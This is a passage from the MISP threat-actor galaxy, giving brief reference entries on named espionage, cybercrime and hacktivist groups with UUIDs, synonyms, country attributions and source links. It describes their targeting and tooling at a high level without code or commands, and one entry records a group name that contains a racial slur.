Metadata key | Value |
---|---|
Tomiris
Tomiris is a threat actor that has been active since at least 2019. They primarily target government and diplomatic entities in the Commonwealth of Independent States region, with occasional victims in other regions being foreign representations of CIS countries. Tomiris uses a wide variety of malware implants, including downloaders, backdoors, and file stealers, developed in different programming languages. They employ various attack vectors such as spear-phishing, DNS hijacking, and exploitation of vulnerabilities. There are potential ties between Tomiris and Turla, but they are considered separate threat actors with distinct targeting and tradecraft by Kaspersky.
Internal MISP references
UUID 2f854548-1af0-4f55-acab-4f85ce9f162c
which can be used as unique global reference for Tomiris
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ShaggyPanther
ShaggyPanther is a threat actor that primarily targets government entities in Taiwan and Malaysia. They have been active since 2008 and utilize hidden encrypted payloads in registry keys. Their activities have been detected in various locations, including Indonesia and Syria.
Internal MISP references
UUID 07791d89-64b6-46df-9f67-ccde8c2cbb20
which can be used as unique global reference for ShaggyPanther
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Fishing Elephant
Fishing Elephant is a threat actor that primarily targets victims in Bangladesh and Pakistan. They rely on consistent TTPs, including payload and communication patterns, while occasionally incorporating new techniques such as geo-fencing and hiding executables within certificate files. Their tool of choice is AresRAT, which they deliver through platforms like Heroku and Dropbox. Recently, they have shifted their focus to government and diplomatic entities in Turkey, Pakistan, Bangladesh, Ukraine, and China.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Fishing Elephant.
Known Synonyms |
---|
Outrider Tiger |
Internal MISP references
UUID 0df34184-4ccf-4357-8e8e-e990058d2992
which can be used as unique global reference for Fishing Elephant
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/apt-trends-report-q1-2020/96826/ - webarchive
- https://securelist.com/apt-trends-report-q1-2022/106351/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
RevengeHotels
RevengeHotels is a targeted cybercrime campaign that has been active since 2015, primarily targeting hotels, hostels, and tourism companies. The threat actor uses remote access Trojan malware to infiltrate hotel front desks and steal credit card data from guests and travelers. The campaign has impacted hotels in multiple countries, including Brazil, Argentina, Chile, and Mexico. The threat actor employs social engineering techniques and sells credentials from infected systems to other cybercriminals for remote access.
Internal MISP references
UUID 083acee6-6969-4c74-80c2-5d442936aa97
which can be used as unique global reference for RevengeHotels
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GhostEmperor
GhostEmperor is a Chinese-speaking threat actor that targets government entities and telecom companies in Southeast Asia. They employ a Windows kernel-mode rootkit called Demodex to gain remote control over their targeted servers. The actor demonstrates a high level of sophistication and uses various anti-forensic and anti-analysis techniques to evade detection. They have been active for a significant period of time and continue to pose a threat to their targets.
Internal MISP references
UUID 3c3ca8f3-c6ab-4c5d-9bd0-be6677d6cdeb
which can be used as unique global reference for GhostEmperor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Operation Triangulation
Operation Triangulation is an ongoing APT campaign targeting iOS devices with zero-click iMessage exploits. The threat actor behind the campaign has been active since at least 2019 and continues to operate. The attack chain involves the delivery of a malicious iMessage attachment that launches a series of exploits, ultimately leading to the deployment of the TriangleDB implant. Kaspersky researchers have discovered and reported multiple vulnerabilities used in the campaign, with patches released by Apple.
Internal MISP references
UUID 220001c6-c976-4cad-a356-4d8c2dd2b1c1
which can be used as unique global reference for Operation Triangulation
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/operation-triangulation-the-last-hardware-mystery/111669/ - webarchive
- https://securelist.com/operation-triangulation-catching-wild-triangle/110916/ - webarchive
- https://securelist.com/triangulation-validators-modules/110847/ - webarchive
- https://securelist.com/operation-triangulation/109842/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Operation Ghoul
Operation Ghoul is a profit-driven threat actor that targeted over 130 organizations in 30 countries, primarily in the industrial and engineering sectors. They employed high-quality social engineering techniques, such as spear-phishing emails disguised as payment advice from a UAE bank, to distribute malware. The group's main motivation is financial gain through the sale of stolen intellectual property and business intelligence, as well as attacks on banking accounts. Their attacks were effective, particularly against companies that were unprepared to detect them.
Internal MISP references
UUID 624cc006-1131-4e53-a53c-3958cfbe233f
which can be used as unique global reference for Operation Ghoul
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
CardinalLizard
CardinalLizard, a cyber threat actor linked to China, has targeted entities in Asia since 2018. Their methods include spear-phishing, custom malware with anti-detection features, and potentially shared infrastructure with other actors.
Internal MISP references
UUID 97f40858-1582-4a59-a990-866813982830
which can be used as unique global reference for CardinalLizard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Ferocious Kitten
Ferocious Kitten is an APT group that has been active against Persian-speaking individuals since 2015 and appears to be based in Iran. Although it has been active over a large timespan, the group has mostly operated under the radar until a lure document was uploaded to VirusTotal and was brought to public knowledge by researchers on Twitter. Subsequently, one of its implants was analyzed by a Chinese intelligence firm. Kaspersky then expanded some of the findings on the group and provided insights on additional variants. The malware dropped from the aforementioned document is dubbed MarkiRAT and is used to record keystrokes and clipboard content, provide file download and upload capabilities, as well as the ability to execute arbitrary commands on the victim's machine. Kaspersky were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method. Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups operating in the domain of dissident surveillance. For example, it used the same C2 domains across its implants for years, which was witnessed in the activity of Domestic Kitten. In the same vein, the Telegram execution hijacking technique observed in this campaign by Ferocious Kitten was also observed being used by Rampant Kitten, as covered by Check Point.
Internal MISP references
UUID f34962a4-a792-4f23-af23-a8bf0f053fcf
which can be used as unique global reference for Ferocious Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Operation Red Signature
The threat actors compromised the update server of a remote support solutions provider to deliver a remote access tool called 9002 RAT to their targets of interest through the update process. They carried this out by first stealing the company's code-signing certificate and then using it to sign the malware. They also configured the update server to only deliver malicious files if the client was located in the IP address ranges of their target organisations.
Internal MISP references
UUID 3e9b98d9-0c61-4050-bafa-486622de0080
which can be used as unique global reference for Operation Red Signature
in MISP communities and other software using the MISP galaxy
External references
- https://decoded.avast.io/threatintel/avast-finds-backdoor-on-us-government-commission-network/?utm_source=rss&utm_medium=rss&utm_campaign=avast-finds-backdoor-on-us-government-commission-network - webarchive
- https://www.trendmicro.com/en_my/research/18/h/supply-chain-attack-operation-red-signature-targets-south-korean-organizations.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Earth Yako
Earth Yako is a threat actor that has been actively targeting researchers in academic organizations and think tanks in Japan. They use spearphishing emails with malicious attachments to gain initial access to their targets' systems. Earth Yako's objectives and patterns suggest a possible connection to a Chinese APT group, but conclusive proof of their nationality is lacking. They have been observed using various malware delivery methods and techniques, such as the use of Winword.exe for DLL Hijacking.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Earth Yako.
Known Synonyms |
---|
Enelink |
Operation RestyLink |
Internal MISP references
UUID 2875aff1-2a0f-4e82-ae42-607a3a74d129
which can be used as unique global reference for Earth Yako
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Urpage
What sets Urpage attacks apart is their targeting of InPage, a word processor for the Urdu and Arabic languages. However, its Delphi backdoor component, which it has in common with Confucius and Patchwork, and its apparent use of Bahamut-like malware are what make it more intriguing, as they connect Urpage to these other known threats. Trend Micro covered the Delphi component in the context of the Confucius and Patchwork connection, and mentioned Urpage as a third, unnamed threat actor connected to the two.
Internal MISP references
UUID 4e137d53-b9cf-4b9a-88c2-f29dd27ac302
which can be used as unique global reference for Urpage
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation Emmental
Operation Emmental, also known as the Retefe gang, is a threat actor group that has been active since at least 2012. They primarily target customers of banks in countries such as Austria, Sweden, Switzerland, and Japan. The group has developed sophisticated malware, including a Mac alternative called Dok, to bypass two-factor authentication and hijack network traffic. They have also been observed using phishing emails to spread their malware. The group is believed to be Russian-speaking and has continuously improved their malicious codes over the years.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Operation Emmental.
Known Synonyms |
---|
Retefe Gang |
Retefe Group |
Internal MISP references
UUID a1527821-fe84-44ec-ad29-8d3040463bc9
which can be used as unique global reference for Operation Emmental
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
TA2725
TA2725 is a threat actor that has been tracked since March 2022. They primarily target organizations in Brazil and Mexico using Brazilian banking malware and phishing techniques. Recently, they have expanded their operations to also target victims in Spain and Mexico simultaneously. TA2725 typically uses GoDaddy virtual hosting for their URL redirector and hosts malicious files on legitimate cloud hosting providers like Amazon AWS, Google Cloud, or Microsoft Azure. They have been known to spoof legitimate companies, such as ÉSECÈ Group, to deceive their victims.
Internal MISP references
UUID 1697dace-fe21-452c-acee-bef62fc5e386
which can be used as unique global reference for TA2725
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Blackatom
Recent campaigns suggest Hamas-linked actors may be advancing their TTPs to include intricate social engineering lures specially crafted to appeal to a niche group of high-value targets. In September 2023, a Palestine-based group likely linked to Hamas targeted Israeli software engineers using an elaborate social engineering ruse that ultimately installed malware and stole cookies. The attackers, which Google's Threat Analysis Group (TAG) tracks as BLACKATOM, posed as employees of legitimate companies and reached out via LinkedIn to invite targets to apply for software development freelance opportunities. Targets included software engineers in the Israeli military, as well as Israel's aerospace and defense industry.
Internal MISP references
UUID 264687b8-82f4-43b5-b7bb-dc3e0b9246bc
which can be used as unique global reference for Blackatom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Palestine |
cfr-suspected-victims | ['Israel'] |
cfr-target-category | ['Military', 'Defense', 'Transportation'] |
cfr-type-of-incident | Espionage |
country | PS |
BANISHED KITTEN
BANISHED KITTEN is an Iranian state-nexus adversary active since at least 2008. While the adversary’s most prominent activity is the July and September 2022 disruptive attacks targeting Albanian government infrastructure and the use of the HomelandJustice persona to leak stolen data, BANISHED KITTEN has likely targeted dissidents using the AllinOneNeo malware family.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BANISHED KITTEN.
Known Synonyms |
---|
DUNE |
Storm-0842 |
Internal MISP references
UUID 3682a08e-c1d9-4dff-ae08-774883dddba6
which can be used as unique global reference for BANISHED KITTEN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Israel', 'Middle East', 'Europe'] |
cfr-target-category | ['Government', 'Healthcare', 'Pharmaceuticals', 'High-Tech', 'Telecomms', 'Education', 'Media', 'NGOs', 'Civil Society'] |
cfr-type-of-incident | ['Espionage', 'Information Operations', 'Sabotage'] |
country | IR |
ProCC
ProCC is a threat actor targeting the hospitality sector with remote access Trojan malware. They use email attachments to exploit vulnerabilities like CVE-2017-0199 and deploy customized versions of RATs such as RevengeRAT, NjRAT, NanoCoreRAT, and 888 RAT. ProCC's malware is capable of collecting data from the clipboard and printer spooler, as well as capturing screenshots on infected machines.
Internal MISP references
UUID c74f78d1-3728-4bb9-b84f-0e46d2e870b2
which can be used as unique global reference for ProCC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ResumeLooters
Since the beginning of 2023, ResumeLooters have been able to compromise at least 65 websites. The group employs a variety of simple techniques, including SQL injection and XSS. The threat actor attempted to insert XSS scripts into all available forms, aiming to have them execute on administrators' devices in order to obtain admin credentials. While the group was able to execute the XSS script on some visitors' devices with administrative access, allowing ResumeLooters to steal the HTML code of the pages the victims were visiting, Group-IB did not find any confirmation of admin credential theft.
Internal MISP references
UUID 76dbe26b-8b39-40f5-bc2b-9620004f388e
which can be used as unique global reference for ResumeLooters
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ShadowSyndicate
ShadowSyndicate is a threat actor associated with various ransomware groups, using a consistent Secure Shell fingerprint across multiple servers. They have been linked to ransomware families such as Quantum, Nokoyawa, and ALPHV. ShadowSyndicate's infrastructure overlaps with that of Cl0p, suggesting potential connections between the two groups. Their activities indicate they may be a Ransomware-as-a-Service affiliate.
Internal MISP references
UUID 24a7e1eb-b7c7-486b-96b2-8d313d65bf70
which can be used as unique global reference for ShadowSyndicate
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
LabHost
LabHost is a threat actor group targeting Canadian Banks with Phishing-as-a-Service attacks. They have been observed using tools like LabRat and LabSend for real-time campaign management and SMS lures. LabHost's phishing campaigns have similarities to Frappo campaigns, but they operate separately and offer different subscription packages.
Internal MISP references
UUID 583cdea6-1d72-44d4-824f-f965e8a23f3e
which can be used as unique global reference for LabHost
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber.Anarchy.Squad
Cyber Anarchy Squad is a pro-Ukrainian hacktivist group known for targeting Russian companies and infrastructure. They have carried out cyberattacks on Russian telecom providers, financial institutions, and government agencies, causing disruptions to services and leaking stolen data. The group has used techniques such as wiping network equipment, defacing websites, and leaking sensitive documents to support their cause. Cyber Anarchy Squad has been active for at least four years, evolving from cyber-bullying to more sophisticated hacking activities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cyber.Anarchy.Squad.
Known Synonyms |
---|
Cyber Anarchy Squad |
Internal MISP references
UUID 264d9a4b-9b0b-416f-9b09-819e96967a30
which can be used as unique global reference for Cyber.Anarchy.Squad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | UA |
GoldFactory
GoldFactory is a threat actor group attributed to developing sophisticated mobile banking malware targeting victims primarily in the Asia-Pacific region, specifically Vietnam and Thailand. They utilize social engineering to deliver malware to victims' devices and have close connections to the Gigabud malware family. GoldFactory's Trojans, such as GoldPickaxe and GoldDigger, employ tactics like smishing, phishing, and fake login screens to compromise victims' phones and steal sensitive information. Their evolving malware suite demonstrates a high level of operational maturity and ingenuity, requiring a proactive and multi-faceted cybersecurity approach to detect and mitigate their threats.
Internal MISP references
UUID 74268518-8dd9-4223-9f7f-54421463cdb3
which can be used as unique global reference for GoldFactory
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
SPIKEDWINE
SPIKEDWINE is a threat actor targeting European officials with a new backdoor called WINELOADER. They use a bait PDF document posing as an invitation letter from the Ambassador of India to lure diplomats. The attack is characterized by advanced tactics, techniques, and procedures in the malware and command and control infrastructure. The motivation behind the attacks seems to be exploiting the geopolitical relations between India and European nations.
Internal MISP references
UUID d3cda6b1-a5da-4afc-bee4-80ea2cf05e5e
which can be used as unique global reference for SPIKEDWINE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UAC-0184
UAC-0184 is a threat actor targeting Ukrainian organizations in Finland, using the Remcos Remote Access Trojan in their attacks. They have been observed utilizing steganographic image files and the IDAT Loader to deliver the malware. The group has targeted the Armed Forces of Ukraine and impersonated military recruitment processes to infect systems with the Remcos RAT.
Internal MISP references
UUID 0e3224a0-3544-47d7-b1ce-fb3eb21286ad
which can be used as unique global reference for UAC-0184
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UNC1549
UNC1549 is an Iranian threat actor linked to Tortoiseshell and potentially the IRGC. They have been active since at least June 2022, targeting entities worldwide with a focus on the Middle East. UNC1549 uses spear-phishing and credential harvesting for initial access, deploying custom malware like MINIBIKE and MINIBUS backdoors. They have also been observed using evasion techniques and a tunneler named LIGHTRAIL in their operations.
Internal MISP references
UUID a2a7d49f-f517-4eeb-9ec8-b9b74e3fe756
which can be used as unique global reference for UNC1549
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Mogilevich
Mogilevich is a ransomware group known for claiming to breach organizations like Epic Games and Ireland's Department of Foreign Affairs, offering stolen data for sale without providing proof of the attacks. They operate as an extortion group, targeting high-profile victims and demanding payment for the data they claim to have stolen. Despite their claims, security researchers have noted that Mogilevich's tactics and website design suggest they may not be a sophisticated threat actor.
Internal MISP references
UUID 95634994-9604-4fe6-9462-f472c2d82271
which can be used as unique global reference for Mogilevich
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
R00tK1T
R00TK1T is a hacking group known for sophisticated cyber attacks targeting governmental agencies in Malaysia, including data exfiltration from the National Population and Family Development Board. The group has publicized their successful attacks on social media, showcasing stolen data. R00TK1T has also targeted Malaysian telecom providers, defacing portals and potentially breaching user data.
Internal MISP references
UUID 69a944ef-4962-432e-a1b9-575b646ee2ed
which can be used as unique global reference for R00tK1T
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IL |
UNC5325
UNC5325 is a suspected Chinese cyber espionage operator that exploited CVE-2024-21893 to compromise Ivanti Connect Secure appliances. UNC5325 leveraged code from open-source projects, installed custom malware, and modified the appliance's settings in order to evade detection and attempt to maintain persistence. UNC5325 has been observed deploying LITTLELAMB.WOOLTEA, PITSTOP, PITDOG, PITJET, and PITHOOK. Mandiant identified TTPs and malware code overlaps in LITTLELAMB.WOOLTEA and PITHOOK with malware leveraged by UNC3886. Mandiant assesses with moderate confidence that UNC5325 is associated with UNC3886.
Internal MISP references
UUID ffb28c09-16a6-483a-817a-89c89751c9d4
which can be used as unique global reference for UNC5325
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Earth Kapre
Earth Kapre is an APT group specializing in cyberespionage. They target organizations in various countries through phishing campaigns using malicious attachments to infect machines. Earth Kapre employs techniques like abusing PowerShell, curl, and Program Compatibility Assistant to execute malicious commands and evade detection within targeted networks. The group has been active since at least 2018 and has been linked to multiple incidents involving data theft and espionage.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Earth Kapre.
Known Synonyms |
---|
Red Wolf |
RedCurl |
Internal MISP references
UUID d4004926-bf12-4cfe-b141-563c8ffb304a
which can be used as unique global reference for Earth Kapre
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Earth Krahang
Earth Krahang is an APT group targeting government organizations worldwide. They use spear-phishing emails, weak internet-facing servers, and custom backdoors like Cobalt Strike, RESHELL, and XDealer to conduct cyber espionage. The group creates VPN servers on infected systems, employs brute force attacks on email accounts, and exploits compromised government infrastructure to attack other governments. Earth Krahang has been linked to another China-linked actor, Earth Lusca, and is believed to be part of a specialized task force for cyber espionage against government institutions.
Internal MISP references
UUID 8cfc9653-51bc-40f1-a267-78a1b8c763f6
which can be used as unique global reference for Earth Krahang
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Mirage Tiger
Internal MISP references
UUID da89d534-5be8-414b-832c-3e9d0d66b4e0
which can be used as unique global reference for Mirage Tiger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
SilitNetwork
SilitNetwork is a hacking group known for targeting high-profile entities, such as airlines, for various motives. They utilize sophisticated tactics to breach their targets, potentially including social engineering and exploiting software vulnerabilities. The group's attack on RwandAir highlighted the vulnerability of the aviation industry and the need for robust cybersecurity measures.
Internal MISP references
UUID a0b92be9-7b62-47df-a2e8-16211c864599
which can be used as unique global reference for SilitNetwork
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Edalat-e Ali
Edalat-e Ali is a hacktivist group known for disrupting Iranian state-run TV and radio transmissions during significant events, such as the Revolution Day ceremonies. They have also targeted government facilities, releasing security camera footage to expose abuses and draw attention to human rights violations. The group has used their hacks to call for protests against the Iranian regime and has displayed anti-government messages during their disruptions. Edalat-e Ali has been active in releasing sensitive information and footage to embarrass Iranian officials and highlight injustices within the country.
Internal MISP references
UUID 1759f8f2-e6ef-4683-a9e4-44984b9deaba
which can be used as unique global reference for Edalat-e Ali
in MISP communities and other software using the MISP galaxy
External references
- https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/ - webarchive
- https://securityaffairs.com/142172/hacktivism/iranian-state-tv-hacked.html - webarchive
- https://www.chronline.com/stories/a-hacking-slugfest-between-iran-and-its-foes-sparks-fears-of-a-wider-cyberwar,281423 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Saad Tycoon
Saad Tycoon is the operator and alleged developer of the Tycoon 2FA PhaaS, a phishing service that targets users for financial gain. The actor utilizes Bitcoin transactions to generate significant profits from the fraudulent service. The phishing infrastructure includes domain registration, server hosting, and possibly Cloudflare protection.
Internal MISP references
UUID d9709373-7a3a-4905-8c90-ba74237e77ea
which can be used as unique global reference for Saad Tycoon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UNC5174
UNC5174, a Chinese state-sponsored threat actor, has been identified by Mandiant for exploiting critical vulnerabilities in F5 BIG-IP and ScreenConnect. They have been linked to targeting research and education institutions, businesses, charities, NGOs, and government organizations in Southeast Asia, the U.S., and the UK. UNC5174 is believed to have connections to China's Ministry of State Security and has been observed using custom tooling and the SUPERSHELL framework in their operations. The actor has shown indications of transitioning from hacktivist collectives to working as a contractor for Chinese intelligence agencies.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UNC5174.
Known Synonyms |
---|
Uteus |
Internal MISP references
UUID 0b158297-ee47-48ef-9346-0cb0f9cb348a
which can be used as unique global reference for UNC5174
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
CyberNiggers
CyberNiggers is a threat group known for breaching various organizations, including the US military, federal contractors, and multinational corporations like General Electric. Led by the prominent member IntelBroker, they specialize in selling access to compromised systems and stealing sensitive data, such as military files and personally identifiable information. The group has targeted a diverse portfolio of organizations, showcasing their strategic approach to gathering varied sets of information. Their activities raise concerns about national security, individual privacy, and the need for robust cybersecurity measures to mitigate the impact of cyber adversaries.
Internal MISP references
UUID 21ad5aad-0a55-457d-b94d-3b4565e82e0a
which can be used as unique global reference for CyberNiggers
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Bignosa
Bignosa is a threat actor known for launching malware campaigns targeting Australian and US organizations using phishing emails with disguised Agent Tesla attachments protected by Cassandra Protector. They compromised servers by installing Plesk and RoundCube, connected via SSH and RDP, and used advanced obfuscation methods to evade detection. Bignosa collaborated with another cybercriminal named Gods, who provided advice and assistance in their malicious activities. The actor has been linked to multiple phishing attacks and malware distribution campaigns, showcasing a high level of sophistication in their operations.
Internal MISP references
UUID 07232925-bd1b-49a9-adca-46536ff6fdd8
which can be used as unique global reference for Bignosa
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | KE |
Smishing Triad
The Smishing Triad is a Chinese-speaking threat group known for targeting postal services and their customers globally through smishing campaigns. They leverage compromised Apple iMessage accounts to send fraudulent messages warning of undeliverable packages, aiming to collect personally identifying information and payment credentials. The group offers smishing kits for sale on platforms like Telegram, enabling other cybercriminals to launch independent attacks. "Smishing Triad" has expanded its operations to target UAE citizens, using geo-filtering to focus on victims in the Emirates.
Internal MISP references
UUID 85db04b5-1ec2-4e25-908a-f53576bd175a
which can be used as unique global reference for Smishing Triad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
BlackJack
Blackjack, a threat actor linked to Ukraine's security apparatus, has targeted critical Russian entities such as ISPs, utilities, and military infrastructure. They have claimed responsibility for launching cyberattacks resulting in substantial damage and data exfiltration. The group allegedly used the Fuxnet malware to target sensor gateways connected to internet-connected sensors, impacting infrastructure monitoring systems. Blackjack has also been involved in attacks against companies like Moscollector, causing disruptions and stealing sensitive data.
Internal MISP references
UUID a5aa9b72-2bfb-427c-97fc-6ec04357233b
which can be used as unique global reference for BlackJack
in MISP communities and other software using the MISP galaxy
External references
- https://www.enigmasoftware.com/fuxneticsmalware-removal/ - webarchive
- https://www.securityweek.com/destructive-ics-malware-fuxnet-used-by-ukraine-against-russian-infrastructure/ - webarchive
- https://claroty.com/team82/research/unpacking-the-blackjack-groups-fuxnet-malware - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-update-pro-ukraine-hacktivists-breach-russian-isp-as-revenge-for-kyivstar-attack/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | UA |
CoralRaider
CoralRaider is a financially motivated threat actor of Vietnamese origin, targeting victims in Asian and Southeast Asian countries since at least 2023. They use the RotBot loader family and XClient stealer to steal victim information, with hardcoded Vietnamese words in their payloads. CoralRaider operates from Hanoi, Vietnam, and uses a Telegram bot as a C2 channel for their malicious campaigns. Their activities include system reconnaissance, data exfiltration, and targeting victims in multiple countries in the region.
Internal MISP references
UUID 20927a3f-d011-4e22-8268-0938d6816a13
which can be used as unique global reference for CoralRaider
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | VN |
RUBYCARP
RUBYCARP is a financially motivated threat actor group likely based in Romania, with a history of at least 10 years of activity. They operate a botnet using public exploits and brute force attacks, communicating via public and private IRC networks. RUBYCARP targets vulnerabilities in frameworks like Laravel and WordPress, as well as conducting phishing operations to steal financial assets. They use a variety of tools, including the Perl Shellbot, for post-exploitation activities and have a diverse set of illicit income streams.
Internal MISP references
UUID 2742b229-02f4-40d0-9b99-91844a2b030e
which can be used as unique global reference for RUBYCARP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RO |
Starry Addax
Starry Addax is a threat actor targeting human rights activists associated with the Sahrawi Arab Democratic Republic using a novel mobile malware called FlexStarling. They conduct phishing attacks to trick targets into installing malicious Android applications and serve credential-harvesting pages to Windows-based targets. Their infrastructure targets both Windows and Android users, with the campaign starting with spear-phishing emails containing requests to install specific mobile apps or related themes. The campaign is in its early stages, with potential for additional malware variants and infrastructure development.
Internal MISP references
UUID 579fde0d-0840-4e49-ad62-405ce338f5a6
which can be used as unique global reference for Starry Addax
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber Army of Russia Reborn
Internal MISP references
UUID e496af6a-1f1b-47fd-b908-fc369e32ffba
which can be used as unique global reference for Cyber Army of Russia Reborn
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
People's Cyber Army of Russia
Internal MISP references
UUID ceee219c-8af2-4cea-8382-6ef6c311eac8
which can be used as unique global reference for People's Cyber Army of Russia
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
RGB-TEAM
RGB-TEAM is a previously unknown Russian-speaking threat actor. They describe themselves as “a community of anonymous hacktivists fighting for freedom.” The group stated that it doesn’t have enemies in the U.S., Europe, “in the East, or in the West.”
Internal MISP references
UUID 9b670978-f346-48dc-a292-7ae05b6f90a0
which can be used as unique global reference for RGB-TEAM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Russia'] |
UNC5266
Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments.
Internal MISP references
UUID 083a637b-c58c-4ccb-ab59-81d783873e80
which can be used as unique global reference for UNC5266
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UNC5330
UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence. Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021.
Internal MISP references
UUID c5ea778c-df2f-4c63-b401-dded9cb2419c
which can be used as unique global reference for UNC5330
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
UNC5337
UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221.
Internal MISP references
